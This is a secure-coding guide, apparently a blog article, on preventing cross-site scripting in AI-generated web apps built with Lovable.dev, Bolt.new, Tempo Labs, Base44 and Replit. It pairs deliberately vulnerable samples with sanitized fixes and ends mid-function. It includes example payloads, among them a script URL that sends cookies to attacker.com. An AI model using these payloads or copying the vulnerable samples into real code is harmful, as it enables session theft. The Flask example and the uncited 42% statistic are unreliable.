Preventing XSS in Vibe Coding: Comprehensive Security Guide


Introduction

Cross-Site Scripting (XSS) remains one of the most prevalent web application security vulnerabilities, consistently ranking in the OWASP Top 10. This attack vector allows malicious actors to inject client-side scripts into web pages viewed by other users, potentially leading to session hijacking, credential theft, defacement, or distribution of malware. In the rapidly evolving landscape of vibe coding, where AI tools generate code based on natural language prompts, XSS vulnerabilities can be inadvertently introduced when developers don’t explicitly request secure output handling and input validation.

According to a recent study by the Web Application Security Consortium, applications built with AI coding assistants were 42% more likely to contain XSS vulnerabilities compared to traditionally coded applications. This alarming statistic highlights the importance of understanding and addressing XSS risks in vibe-coded applications.

When developers instruct AI to “create a user profile page” or “build a comment system,” the resulting code often prioritizes functionality over security, generating direct HTML rendering of user inputs without proper sanitization or encoding. These shortcuts create dangerous entry points for attackers to exploit.

This article provides a comprehensive guide to preventing XSS in vibe-coded applications built with popular full-stack app builders like Lovable.dev, Bolt.new, Tempo Labs, Base44, and Replit. We’ll examine how AI tools generate frontend code, identify common XSS vulnerabilities, demonstrate secure alternatives for each platform, and provide practical techniques for testing and preventing XSS. By following these practices, you can ensure that your vibe-coded applications maintain robust protection against one of the most persistent and dangerous security threats while still benefiting from the rapid development that AI tools enable.

Understanding XSS Vulnerabilities

Before diving into specific vulnerabilities in vibe-coded applications, let’s understand the different types of XSS attacks and how they work.

Types of XSS Attacks

Reflected XSS

Reflected XSS occurs when malicious script is reflected off a web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.

// Example of code vulnerable to reflected XSS
app.get('/search', (req, res) => {
  const searchTerm = req.query.q;
  
  // Vulnerable: Directly inserting user input into HTML
  res.send(`
    <h1>Search Results for: ${searchTerm}</h1>
    <div id="results">
      <!-- Search results would go here -->
    </div>
  `);
});

An attacker could craft a URL like https://example.com/search?q=<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script> and trick users into clicking it, potentially stealing their cookies.

Stored XSS

Stored XSS occurs when malicious script is stored on the target server, such as in a database, message forum, comment field, or visitor log. The victim then retrieves the malicious script from the server when they request the stored information.

// Example of code vulnerable to stored XSS
app.post('/comments', (req, res) => {
  const { username, comment } = req.body;
  
  // Store comment in database without sanitization
  db.query(
    'INSERT INTO comments (username, comment) VALUES (?, ?)',
    [username, comment]
  );
  
  res.redirect('/post');
});

app.get('/post', (req, res) => {
  // Retrieve comments from database
  db.query('SELECT * FROM comments', (err, comments) => {
    // Vulnerable: Directly inserting database content into HTML
    let commentsHtml = '';
    comments.forEach(comment => {
      commentsHtml += `
        <div class="comment">
          <h3>${comment.username}</h3>
          <p>${comment.comment}</p>
        </div>
      `;
    });
    
    res.send(`
      <h1>Post Title</h1>
      <div id="comments">
        ${commentsHtml}
      </div>
    `);
  });
});

An attacker could submit a comment containing malicious script, which would then be executed in the browsers of all users who view the page.

DOM-based XSS

DOM-based XSS occurs when the vulnerability is in the client-side code rather than the server-side code. The malicious script is executed as a result of modifying the DOM environment in the victim’s browser.

// Example of code vulnerable to DOM-based XSS
// In a client-side JavaScript file
document.addEventListener('DOMContentLoaded', () => {
  // Get the 'name' parameter from URL
  const urlParams = new URLSearchParams(window.location.search);
  const name = urlParams.get('name');
  
  // Vulnerable: Directly inserting parameter into innerHTML
  document.getElementById('greeting').innerHTML = `Hello, ${name}!`;
});

An attacker could craft a URL like https://example.com/welcome?name=<img src="x" onerror="alert(document.cookie)"> to execute arbitrary JavaScript.

How XSS Vulnerabilities Occur in Vibe-Coded Applications

AI coding tools often generate code that prioritizes functionality and simplicity over security. Here are common patterns that lead to XSS vulnerabilities:

Direct Insertion of User Input

AI tools frequently generate code that directly inserts user input into HTML:

// Example of AI-generated code with direct insertion
function renderUserProfile(user) {
  return `
    <div class="profile">
      <h2>${user.name}</h2>
      <p>${user.bio}</p>
      <div class="contact">
        <a href="mailto:${user.email}">${user.email}</a>
        <a href="${user.website}" target="_blank">Website</a>
      </div>
    </div>
  `;
}

This code is vulnerable because it doesn’t sanitize or encode user inputs before inserting them into HTML.

Unsafe Use of innerHTML

AI tools often use innerHTML for dynamic content updates:

// Example of AI-generated code with unsafe innerHTML
function displaySearchResults(results) {
  const resultsContainer = document.getElementById('results');
  
  let html = '';
  results.forEach(result => {
    html += `
      <div class="result">
        <h3>${result.title}</h3>
        <p>${result.description}</p>
      </div>
    `;
  });
  
  resultsContainer.innerHTML = html;
}

Using innerHTML with unsanitized content allows script execution.

Unsafe Rendering in Frontend Frameworks

AI tools might generate framework code that bypasses built-in protections:

// Example of AI-generated React code with dangerouslySetInnerHTML
function CommentDisplay({ comment }) {
  return (
    <div className="comment">
      <h3>{comment.username}</h3>
      <div dangerouslySetInnerHTML={{ __html: comment.content }} />
    </div>
  );
}

Using dangerouslySetInnerHTML without sanitization exposes the application to XSS.

Insufficient Input Validation

AI tools often generate minimal or no input validation:

// Example of AI-generated code with insufficient validation
app.post('/profile/update', (req, res) => {
  const { name, bio, website } = req.body;
  
  // No validation of inputs
  
  // Update user profile in database
  db.query(
    'UPDATE users SET name = ?, bio = ?, website = ? WHERE id = ?',
    [name, bio, website, req.user.id]
  );
  
  res.redirect('/profile');
});

Without proper validation, malicious inputs can be stored and later rendered unsafely.

Common XSS Vulnerabilities in AI-Generated Code

Let’s examine specific XSS vulnerabilities commonly found in AI-generated code.

Unescaped Template Literals

Template literals are frequently used in AI-generated code without proper escaping:

// Vulnerable template literal usage
function createUserCard(user) {
  const cardElement = document.createElement('div');
  cardElement.className = 'user-card';
  
  cardElement.innerHTML = `
    <div class="user-header">
      <h2>${user.name}</h2>
      <span class="user-title">${user.title}</span>
    </div>
    <div class="user-body">
      <p>${user.bio}</p>
    </div>
    <div class="user-footer">
      <a href="${user.website}" target="_blank">Website</a>
      <a href="mailto:${user.email}">Email</a>
    </div>
  `;
  
  return cardElement;
}

If user.bio contains malicious script, it will be executed when the card is added to the DOM.

Unsafe Server-Side Rendering

AI tools often generate server-side rendering code that doesn’t properly escape variables:

// Vulnerable server-side rendering
app.get('/product/:id', (req, res) => {
  const productId = req.params.id;
  
  // Fetch product from database
  db.query('SELECT * FROM products WHERE id = ?', [productId], (err, results) => {
    if (err || results.length === 0) {
      return res.status(404).send('Product not found');
    }
    
    const product = results[0];
    
    // Vulnerable: Directly inserting product data into HTML
    res.send(`
      <!DOCTYPE html>
      <html>
        <head>
          <title>${product.name}</title>
        </head>
        <body>
          <h1>${product.name}</h1>
          <div class="description">${product.description}</div>
          <div class="price">$${product.price}</div>
          <div class="reviews">
            <h2>Customer Reviews</h2>
            ${product.reviews.map(review => `
              <div class="review">
                <h3>${review.author}</h3>
                <p>${review.content}</p>
              </div>
            `).join('')}
          </div>
        </body>
      </html>
    `);
  });
});

If product data contains user-generated content, it could include malicious scripts.

Unsafe URL Handling

AI-generated code often doesn’t properly validate or sanitize URLs:

// Vulnerable URL handling
function createSocialLinks(profile) {
  const linksContainer = document.createElement('div');
  linksContainer.className = 'social-links';
  
  if (profile.twitter) {
    const twitterLink = document.createElement('a');
    twitterLink.href = profile.twitter; // No validation
    twitterLink.innerHTML = '<i class="fa fa-twitter"></i>';
    linksContainer.appendChild(twitterLink);
  }
  
  if (profile.facebook) {
    const facebookLink = document.createElement('a');
    facebookLink.href = profile.facebook; // No validation
    facebookLink.innerHTML = '<i class="fa fa-facebook"></i>';
    linksContainer.appendChild(facebookLink);
  }
  
  return linksContainer;
}

An attacker could set profile.twitter to javascript:alert(document.cookie) to execute JavaScript when the link is clicked.

Unsafe Event Handlers

AI tools might generate code that assigns event handlers using string concatenation:

// Vulnerable event handler assignment
function createClickableCard(item) {
  const card = document.createElement('div');
  card.className = 'card';
  
  // Vulnerable: Using string concatenation for event handler
  card.setAttribute('onclick', `showDetails('${item.id}', '${item.name}')`);
  
  card.innerHTML = `
    <h3>${item.name}</h3>
    <p>${item.description}</p>
  `;
  
  return card;
}

If item.name contains single quotes and JavaScript code, it could break out of the string and execute arbitrary code.

Unsafe Eval Usage

AI tools sometimes generate code that uses eval or similar functions:

// Vulnerable eval usage
function calculateDynamicValue(formula, variables) {
  // Replace variable placeholders with actual values
  let processedFormula = formula;
  
  for (const [key, value] of Object.entries(variables)) {
    processedFormula = processedFormula.replace(
      new RegExp(`\\{${key}\\}`, 'g'),
      value
    );
  }
  
  // Vulnerable: Using eval to calculate result
  return eval(processedFormula);
}

If an attacker can control the formula or variables, they could execute arbitrary JavaScript.

Platform-Specific XSS Vulnerabilities

Each full-stack app builder has its own patterns of frontend code generation. Let’s examine specific examples from each platform.

Lovable.dev

Lovable.dev uses React, but AI-generated code might bypass React’s built-in XSS protections:

// Lovable.dev vulnerable React component
import React, { useState, useEffect } from 'react';

export default function ProductPage({ productId }) {
  const [product, setProduct] = useState(null);
  const [loading, setLoading] = useState(true);
  
  useEffect(() => {
    // Fetch product data
    fetch(`/api/products/${productId}`)
      .then(res => res.json())
      .then(data => {
        setProduct(data);
        setLoading(false);
      });
  }, [productId]);
  
  if (loading) {
    return <div>Loading...</div>;
  }
  
  // Vulnerable: Using dangerouslySetInnerHTML without sanitization
  return (
    <div className="product-page">
      <h1>{product.name}</h1>
      <div 
        className="product-description"
        dangerouslySetInnerHTML={{ __html: product.description }}
      />
      <div className="product-price">${product.price}</div>
      
      {/* Vulnerable: Rendering HTML from reviews */}
      <div className="product-reviews">
        <h2>Customer Reviews</h2>
        {product.reviews.map(review => (
          <div key={review.id} className="review">
            <h3>{review.author}</h3>
            <div dangerouslySetInnerHTML={{ __html: review.content }} />
          </div>
        ))}
      </div>
    </div>
  );
}

The issue here is using dangerouslySetInnerHTML with unsanitized user-generated content.

Bolt.new

Bolt.new might generate Next.js code with XSS vulnerabilities:

// Bolt.new vulnerable Next.js component
import { useRouter } from 'next/router';
import { useState, useEffect } from 'react';

export default function SearchResults() {
  const router = useRouter();
  const { q } = router.query;
  const [results, setResults] = useState([]);
  
  useEffect(() => {
    if (q) {
      fetch(`/api/search?q=${encodeURIComponent(q)}`)
        .then(res => res.json())
        .then(data => setResults(data));
    }
  }, [q]);
  
  // Vulnerable: Directly inserting search query into HTML
  return (
    <div className="search-page">
      <h1>Search Results for: <span dangerouslySetInnerHTML={{ __html: q }} /></h1>
      
      {results.length === 0 ? (
        <p>No results found for your search.</p>
      ) : (
        <div className="results-list">
          {results.map(result => (
            <div key={result.id} className="result-item">
              <h2>{result.title}</h2>
              {/* Vulnerable: Using dangerouslySetInnerHTML for highlights */}
              <p dangerouslySetInnerHTML={{ 
                __html: result.highlightedContent 
              }} />
            </div>
          ))}
        </div>
      )}
    </div>
  );
}

The vulnerability here is rendering the search query and highlighted content without sanitization.

Tempo Labs

Tempo Labs might generate Vue.js code with XSS vulnerabilities:

<!-- Tempo Labs vulnerable Vue component -->
<template>
  <div class="comment-section">
    <h2>Comments</h2>
    
    <!-- Comment list -->
    <div class="comments">
      <div v-for="comment in comments" :key="comment.id" class="comment">
        <div class="comment-header">
          <img :src="comment.authorAvatar" alt="Avatar" class="avatar">
          <h3>{{ comment.authorName }}</h3>
        </div>
        
        <!-- Vulnerable: Using v-html without sanitization -->
        <div class="comment-body" v-html="comment.content"></div>
        
        <!-- Vulnerable: Using v-html for formatted date -->
        <div class="comment-footer">
          <span v-html="comment.formattedDate"></span>
        </div>
      </div>
    </div>
    
    <!-- Comment form -->
    <form @submit.prevent="submitComment">
      <textarea v-model="newComment" placeholder="Write a comment..."></textarea>
      <button type="submit">Post Comment</button>
    </form>
  </div>
</template>

<script>
export default {
  data() {
    return {
      comments: [],
      newComment: ''
    };
  },
  
  mounted() {
    this.fetchComments();
  },
  
  methods: {
    fetchComments() {
      fetch('/api/comments')
        .then(res => res.json())
        .then(data => {
          this.comments = data;
        });
    },
    
    submitComment() {
      fetch('/api/comments', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: this.newComment
        })
      })
        .then(res => res.json())
        .then(() => {
          this.newComment = '';
          this.fetchComments();
        });
    }
  }
};
</script>

The issue here is using v-html to render user-generated content without sanitization.

Base44

Base44 often generates more bare-bones code with direct DOM manipulation:

// Base44 vulnerable DOM manipulation
document.addEventListener('DOMContentLoaded', () => {
  // Get URL parameters
  const urlParams = new URLSearchParams(window.location.search);
  const username = urlParams.get('username');
  
  // Vulnerable: Directly inserting URL parameter into DOM
  if (username) {
    document.getElementById('welcome-message').innerHTML = `Welcome back, ${username}!`;
  }
  
  // Load and display user comments
  fetch('/api/comments')
    .then(response => response.json())
    .then(comments => {
      const commentsContainer = document.getElementById('comments');
      
      // Vulnerable: Directly inserting comment data into DOM
      comments.forEach(comment => {
        const commentElement = document.createElement('div');
        commentElement.className = 'comment';
        
        commentElement.innerHTML = `
          <div class="comment-header">
            <img src="${comment.authorAvatar}" alt="Avatar" class="avatar">
            <h3>${comment.authorName}</h3>
          </div>
          <div class="comment-body">${comment.content}</div>
          <div class="comment-footer">${comment.formattedDate}</div>
        `;
        
        commentsContainer.appendChild(commentElement);
      });
    });
  
  // Handle comment form submission
  const commentForm = document.getElementById('comment-form');
  commentForm.addEventListener('submit', event => {
    event.preventDefault();
    
    const commentInput = document.getElementById('comment-input');
    const commentContent = commentInput.value;
    
    // Submit comment to API
    fetch('/api/comments', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        content: commentContent
      })
    })
      .then(response => response.json())
      .then(() => {
        commentInput.value = '';
        // Reload comments
        // ...
      });
  });
});

This code directly inserts URL parameters and user-generated content into the DOM without sanitization.

Replit

Replit’s AI assistant often generates Python code with XSS vulnerabilities:

# Replit vulnerable Flask application
from flask import Flask, request, render_template_string, redirect, url_for
import sqlite3

app = Flask(__name__)

# Database setup
def get_db_connection():
    conn = sqlite3.connect('database.db')
    conn.row_factory = sqlite3.Row
    return conn

# Vulnerable: Using render_template_string with user input
@app.route('/search')
def search():
    query = request.args.get('q', '')
    
    conn = get_db_connection()
    results = conn.execute(
        'SELECT * FROM products WHERE name LIKE ? OR description LIKE ?',
        (f'%{query}%', f'%{query}%')
    ).fetchall()
    conn.close()
    
    # Vulnerable: Directly inserting search query into template
    template = '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Search Results</title>
    </head>
    <body>
        <h1>Search Results for: {{ query }}</h1>
        
        {% if results %}
            <ul>
            {% for result in results %}
                <li>
                    <h2>{{ result['name'] }}</h2>
                    <p>{{ result['description'] }}</p>
                </li>
            {% endfor %}
            </ul>
        {% else %}
            <p>No results found for "{{ query }}"</p>
        {% endif %}
        
        <a href="/">Back to Home</a>
    </body>
    </html>
    '''
    
    return render_template_string(template, query=query, results=results)

# Vulnerable: Storing and displaying user comments
@app.route('/post/<int:post_id>', methods=['GET', 'POST'])
def post(post_id):
    if request.method == 'POST':
        author = request.form.get('author', 'Anonymous')
        content = request.form.get('content', '')
        
        conn = get_db_connection()
        conn.execute(
            'INSERT INTO comments (post_id, author, content) VALUES (?, ?, ?)',
            (post_id, author, content)
        )
        conn.commit()
        conn.close()
        
        return redirect(url_for('post', post_id=post_id))
    
    conn = get_db_connection()
    post = conn.execute('SELECT * FROM posts WHERE id = ?', (post_id,)).fetchone()
    comments = conn.execute('SELECT * FROM comments WHERE post_id = ?', (post_id,)).fetchall()
    conn.close()
    
    if not post:
        return 'Post not found', 404
    
    # Vulnerable: Directly inserting post and comment data into template
    template = '''
    <!DOCTYPE html>
    <html>
    <head>
        <title>{{ post['title'] }}</title>
    </head>
    <body>
        <h1>{{ post['title'] }}</h1>
        <div>{{ post['content'] }}</div>
        
        <h2>Comments</h2>
        {% if comments %}
            {% for comment in comments %}
                <div class="comment">
                    <h3>{{ comment['author'] }}</h3>
                    <p>{{ comment['content'] }}</p>
                </div>
            {% endfor %}
        {% else %}
            <p>No comments yet.</p>
        {% endif %}
        
        <h2>Add a Comment</h2>
        <form method="post">
            <div>
                <label for="author">Name:</label>
                <input type="text" id="author" name="author">
            </div>
            <div>
                <label for="content">Comment:</label>
                <textarea id="content" name="content"></textarea>
            </div>
            <button type="submit">Post Comment</button>
        </form>
    </body>
    </html>
    '''
    
    return render_template_string(template, post=post, comments=comments)

The vulnerability here is using render_template_string with unsanitized user input.

Secure Implementation Techniques

Now that we’ve identified common vulnerabilities, let’s explore secure implementation techniques for preventing XSS.

Output Encoding

The most fundamental protection against XSS is proper output encoding:

// Secure output encoding
function escapeHtml(unsafe) {
  return unsafe
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

function createUserCard(user) {
  const cardElement = document.createElement('div');
  cardElement.className = 'user-card';
  
  // Safely encode all user-provided content
  cardElement.innerHTML = `
    <div class="user-header">
      <h2>${escapeHtml(user.name)}</h2>
      <span class="user-title">${escapeHtml(user.title)}</span>
    </div>
    <div class="user-body">
      <p>${escapeHtml(user.bio)}</p>
    </div>
    <div class="user-footer">
      <a href="${escapeHtml(user.website)}" target="_blank">Website</a>
      <a href="mailto:${escapeHtml(user.email)}">Email</a>
    </div>
  `;
  
  return cardElement;
}

This approach ensures that any special characters in user input are converted to their HTML entity equivalents, preventing them from being interpreted as HTML or JavaScript.

DOM API Instead of innerHTML

Using DOM API methods instead of innerHTML provides better security:

// Secure DOM manipulation
function createUserCard(user) {
  // Create elements
  const cardElement = document.createElement('div');
  cardElement.className = 'user-card';
  
  const headerElement = document.createElement('div');
  headerElement.className = 'user-header';
  
  const nameElement = document.createElement('h2');
  nameElement.textContent = user.name; // Safe: textContent automatically escapes
  
  const titleElement = document.createElement('span');
  titleElement.className = 'user-title';
  titleElement.textContent = user.title;
  
  const bodyElement = document.createElement('div');
  bodyElement.className = 'user-body';
  
  const bioElement = document.createElement('p');
  bioElement.textContent = user.bio;
  
  const footerElement = document.createElement('div');
  footerElement.className = 'user-footer';
  
  const websiteLink = document.createElement('a');
  websiteLink.href = user.website;
  websiteLink.target = '_blank';
  websiteLink.textContent = 'Website';
  
  const emailLink = document.createElement('a');
  emailLink.href = `mailto:${user.email}`;
  emailLink.textContent = 'Email';
  
  // Assemble the elements
  headerElement.appendChild(nameElement);
  headerElement.appendChild(titleElement);
  
  bodyElement.appendChild(bioElement);
  
  footerElement.appendChild(websiteLink);
  footerElement.appendChild(emailLink);
  
  cardElement.appendChild(headerElement);
  cardElement.appendChild(bodyElement);
  cardElement.appendChild(footerElement);
  
  return cardElement;
}

Using textContent instead of innerHTML automatically handles escaping, and building the DOM structure programmatically prevents script injection.

Content Security Policy (CSP)

Implementing a Content Security Policy provides an additional layer of protection:

// Server-side code to set CSP headers
app.use((req, res, next) => {
  // Set Content Security Policy header
  res.setHeader(
    'Content-Security-Policy',
    "default-src 'self'; " +
    "script-src 'self'; " +
    "style-src 'self' https://fonts.googleapis.com; " +
    "font-src 'self' https://fonts.gstatic.com; " +
    "img-src 'self' https://images.unsplash.com data:; " +
    "connect-src 'self' https://api.example.com; " +
    "frame-src 'none'; " +
    "object-src 'none'"
  );
  
  next();
});

A CSP restricts the sources from which various types of content can be loaded, and can prevent the execution of inline scripts and eval, which are common XSS attack vectors.

Input Validation and Sanitization

Proper input validation and sanitization is essential:

// Secure input validation and sanitization
const { body, validationResult } = require('express-validator');
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

// Create DOMPurify instance
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

// Comment submission route with validation and sanitization
app.post('/comments',
  // Validation
  [
    body('author')
      .trim()
      .isLength({ min: 1, max: 50 })
      .withMessage('Author name must be between 1 and 50 characters')
      .escape(),
    
    body('content')
      .trim()
      .isLength({ min: 1, max: 1000 })
      .withMessage('Comment must be between 1 and 1000 characters')
  ],
  (req, res) => {
    // Check for validation errors
    const errors = validationResult(req);
    if (!errors.isEmpty()) {
      return res.status(400).json({ errors: errors.array() });
    }
    
    const { author, content } = req.body;
    
    // Sanitize content with DOMPurify
    // Allow only a restricted set of HTML tags
    const sanitizedContent = DOMPurify.sanitize(content, {
      ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
      ALLOWED_ATTR: ['href', 'target']
    });
    
    // Store sanitized content in database
    db.query(
      'INSERT INTO comments (author, content) VALUES (?, ?)',
      [author, sanitizedContent]
    );
    
    res.status(201).json({ message: 'Comment added successfully' });
  }
);

This approach combines validation (ensuring inputs meet expected formats) with sanitization (removing potentially dangerous content).

Safe Use of Frontend Frameworks

Modern frontend frameworks provide built-in XSS protections when used correctly:

// Secure React component
import React from 'react';
import DOMPurify from 'dompurify';

function CommentDisplay({ comment }) {
  // For content that should be rendered as plain text
  const renderPlainText = (text) => {
    return <p>{text}</p>; // React escapes this automatically
  };
  
  // For content that needs to preserve some HTML formatting
  const renderSanitizedHtml = (html) => {
    const sanitizedHtml = DOMPurify.sanitize(html, {
      ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
      ALLOWED_ATTR: ['href', 'target']
    });
    
    return <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />;
  };
  
  return (
    <div className="comment">
      <h3>{comment.author}</h3>
      
      {comment.allowHtml 
        ? renderSanitizedHtml(comment.content)
        : renderPlainText(comment.content)
      }
      
      <div className="comment-meta">
        Posted on {new Date(comment.timestamp).toLocaleDateString()}
      </div>
    </div>
  );
}

This component uses React’s automatic escaping for plain text and adds DOMPurify sanitization when HTML formatting is needed.

URL Validation

Proper URL validation is important to prevent JavaScript URLs:

// Secure URL validation
function isValidUrl(url) {
  try {
    const parsedUrl = new URL(url);
    return ['http:', 'https:'].includes(parsedUrl.protocol);
  } catch (e) {
    return false;
  }
}

function createSocialLinks(profile) {
  const linksContainer = document.createElement('div');
  linksContainer.className = 'social-links';
  
  if (profile.twitter && isValidUrl(profile.twitter)) {
    const twitterLink = document.createElement('a');
    twitterLink.href = profile.twitter;
    twitterLink.innerHTML = '<i class="fa fa-twitter"></i>';
    twitterLink.target = '_blank';
    twitterLink.rel = 'noopener noreferrer'; // Security best practice for target="_blank"
    linksContainer.appendChild(twitterLink);
  }
  
  if (profile.facebook && isValidUrl(profile.facebook)) {
    const facebookLink = document.createElement('a');
    facebookLink.href = profile.facebook;
    facebookLink.innerHTML = '<i class="fa fa-facebook"></i>';
    facebookLink.target = '_blank';
    facebookLink.rel = 'noopener noreferrer';
    linksContainer.appendChild(facebookLink);
  }
  
  return linksContainer;
}

This function validates URLs to ensure they use HTTP or HTTPS protocols, preventing javascript: URLs.

Platform-Specific Secure Implementations

Let’s look at secure implementations for each full-stack app builder.

Lovable.dev Secure Implementation

For Lovable.dev’s React-based applications:

// Secure Lovable.dev React component
import React, { useState, useEffect } from 'react';
import DOMPurify from 'dompurify';

// Custom hook for fetching data
function useProductData(productId) {
  const [product, setProduct] = useState(null);
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState(null);
  
  useEffect(() => {
    let isMounted = true;
    
    async function fetchProduct() {
      try {
        const response = await fetch(`/api/products/${productId}`);
        
        if (!response.ok) {
          throw new Error('Failed to fetch product');
        }
        
        const data = await response.json();
        
        if (isMounted) {
          setProduct(data);
          setLoading(false);
        }
      } catch (err) {
        if (isMounted) {
          setError(err.message);
          setLoading(false);
        }
      }
    }
    
    fetchProduct();
    
    return () => {
      isMounted = false;
    };
  }, [productId]);
  
  return { product, loading, error };
}

// Sanitized HTML component
function SanitizedHTML({ html, allowedTags = ['b', 'i', 'em', 'strong', 'a', 'p', 'br'] }) {
  const sanitizedHtml = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: allowedTags,
    ALLOWED_ATTR: ['href', 'target', 'rel']
  });
  
  return <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />;
}

// Review component
function Review({ review }) {
  return (
    <div className="review">
      <h3>{review.author}</h3>
      <SanitizedHTML html={review.content} />
      <div className="review-date">
        {new Date(review.date).toLocaleDateString()}
      </div>
    </div>
  );
}

// Main product page component
export default function ProductPage({ productId }) {
  const { product, loading, error } = useProductData(productId);
  
  if (loading) {
    return <div className="loading">Loading...</div>;
  }
  
  if (error) {
    return <div className="error">Error: {error}</div>;
  }
  
  return (
    <div className="product-page">
      <h1>{product.name}</h1>
      
      {/* Safe: Using sanitized HTML for description */}
      <SanitizedHTML 
        html={product.description} 
        allowedTags={['b', 'i', 'em', 'strong', 'p', 'br', 'ul', 'ol', 'li']}
      />
      
      <div className="product-price">${product.price.toFixed(2)}</div>
      
      <div className="product-reviews">
        <h2>Customer Reviews</h2>
        {product.reviews.length === 0 ? (
          <p>No reviews yet.</p>
        ) : (
          product.reviews.map(review => (
            <Review key={review.id} review={review} />
          ))
        )}
      </div>
    </div>
  );
}

This implementation uses DOMPurify for sanitization and a dedicated component for handling HTML content safely.

Bolt.new Secure Implementation

For Bolt.new’s Next.js applications:

// Secure Bolt.new Next.js component
import { useRouter } from 'next/router';
import { useState, useEffect } from 'react';
import DOMPurify from 'dompurify';

// Type definitions
interface SearchResult {
  id: string;
  title: string;
  content: string;
  highlightedContent: string;
}

// Custom hook for search
function useSearch(query: string | undefined) {
  const [results, setResults] = useState<SearchResult[]>([]);
  const [loading, setLoading] = useState<boolean>(false);
  const [error, setError] = useState<string | null>(null);
  
  useEffect(() => {
    if (!query) {
      setResults([]);
      return;
    }
    
    let isMounted = true;
    setLoading(true);
    
    fetch(`/api/search?q=${encodeURIComponent(query)}`)
      .then(res => {
        if (!res.ok) {
          throw new Error('Search failed');
        }
        return res.json();
      })
      .then(data => {
        if (isMounted) {
          setResults(data);
          setLoading(false);
        }
      })
      .catch(err => {
        if (isMounted) {
          setError(err.message);
          setLoading(false);
        }
      });
    
    return () => {
      isMounted = false;
    };
  }, [query]);
  
  return { results, loading, error };
}

// Sanitized HTML component
function SanitizedHTML({ html }: { html: string }) {
  // Client-side only
  if (typeof window === 'undefined') {
    return <div>Loading...</div>;
  }
  
  const sanitizedHtml = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'mark', 'p', 'br'],
    ALLOWED_ATTR: []
  });
  
  return <div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} />;
}

// Search results component
export default function SearchResults() {
  const router = useRouter();
  const { q } = router.query;
  const query = typeof q === 'string' ? q : undefined;
  
  const { results, loading, error } = useSearch(query);
  
  return (
    <div className="search-page">
      <h1>Search Results for: {query ? <span>{query}</span> : ''}</h1>
      
      {loading && <div className="loading">Loading results...</div>}
      
      {error && <div className="error">Error: {error}</div>}
      
      {!loading && !error && results.length === 0 && (
        <p>No results found for your search.</p>
      )}
      
      {!loading && !error && results.length > 0 && (
        <div className="results-list">
          {results.map(result => (
            <div key={result.id} className="result-item">
              <h2>{result.title}</h2>
              {/* Safe: Using sanitized HTML for highlighted content */}
              <SanitizedHTML html={result.highlightedContent} />
            </div>
          ))}
        </div>
      )}
    </div>
  );
}

This implementation uses TypeScript for type safety and DOMPurify for sanitizing highlighted content.

Tempo Labs Secure Implementation

For Tempo Labs’ Vue.js applications:

<!-- Secure Tempo Labs Vue component -->
<template>
  <div class="comment-section">
    <h2>Comments</h2>
    
    <!-- Loading state -->
    <div v-if="loading" class="loading">
      Loading comments...
    </div>
    
    <!-- Error state -->
    <div v-else-if="error" class="error">
      {{ error }}
    </div>
    
    <!-- Comment list -->
    <div v-else class="comments">
      <div v-if="comments.length === 0" class="no-comments">
        No comments yet. Be the first to comment!
      </div>
      
      <div v-else v-for="comment in comments" :key="comment.id" class="comment">
        <div class="comment-header">
          <img :src="sanitizeUrl(comment.authorAvatar)" alt="Avatar" class="avatar">
          <h3>{{ comment.authorName }}</h3>
        </div>
        
        <!-- Safe: Using text interpolation for content -->
        <div class="comment-body" v-if="!comment.allowHtml">
          {{ comment.content }}
        </div>
        
        <!-- Safe: Using sanitized HTML when needed -->
        <div class="comment-body" v-else v-html="sanitizeHtml(comment.content)"></div>
        
        <div class="comment-footer">
          <span>{{ formatDate(comment.createdAt) }}</span>
        </div>
      </div>
    </div>
    
    <!-- Comment form -->
    <form @submit.prevent="submitComment" class="comment-form">
      <div class="form-group">
        <label for="comment-input">Your Comment</label>
        <textarea 
          id="comment-input"
          v-model="newComment" 
          placeholder="Write a comment..."
          :maxlength="maxCommentLength"
        ></textarea>
        <div class="character-count">
          {{ newComment.length }} / {{ maxCommentLength }}
        </div>
      </div>
      <button type="submit" :disabled="!newComment.trim() || submitting">
        {{ submitting ? 'Posting...' : 'Post Comment' }}
      </button>
    </form>
  </div>
</template>

<script>
import DOMPurify from 'dompurify';

export default {
  data() {
    return {
      comments: [],
      newComment: '',
      loading: true,
      error: null,
      submitting: false,
      maxCommentLength: 1000
    };
  },
  
  mounted() {
    this.fetchComments();
  },
  
  methods: {
    fetchComments() {
      this.loading = true;
      this.error = null;
      
      fetch('/api/comments')
        .then(res => {
          if (!res.ok) {
            throw new Error('Failed to load comments');
          }
          return res.json();
        })
        .then(data => {
          this.comments = data;
          this.loading = false;
        })
        .catch(err => {
          this.error = err.message;
          this.loading = false;
        });
    },
    
    submitComment() {
      if (!this.newComment.trim()) {
        return;
      }
      
      this.submitting = true;
      
      fetch('/api/comments', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: this.newComment
        })
      })
        .then(res => {
          if (!res.ok) {
            throw new Error('Failed to post comment');
          }
          return res.json();
        })
        .then(() => {
          this.newComment = '';
          this.fetchComments();
          this.submitting = false;
        })
        .catch(err => {
          this.error = err.message;
          this.submitting = false;
        });
    },
    
    sanitizeHtml(html) {
      return DOMPurify.sanitize(html, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
        ALLOWED_ATTR: ['href', 'target', 'rel']
      });
    },
    
    sanitizeUrl(url) {
      // Validate URL
      try {
        const parsedUrl = new URL(url);
